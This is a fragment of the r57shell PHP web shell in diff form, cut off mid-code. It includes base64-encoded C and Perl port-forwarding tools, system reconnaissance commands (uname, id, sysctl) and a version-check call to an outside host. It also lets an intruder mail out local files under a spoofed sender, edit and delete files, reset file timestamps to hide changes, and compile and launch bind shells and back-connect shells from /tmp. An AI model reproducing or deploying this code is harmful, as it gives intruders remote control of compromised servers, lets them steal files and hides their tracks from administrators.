+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else  
+  {	
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }  
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}  
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix) 
+ { 
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; 
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."safe_mode: <b>";
+echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>".ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b><br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';	
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");	
+ err(6+$res);
+ $_POST['cmd']="";  
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {  
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else 
+  {	
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";                   	
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
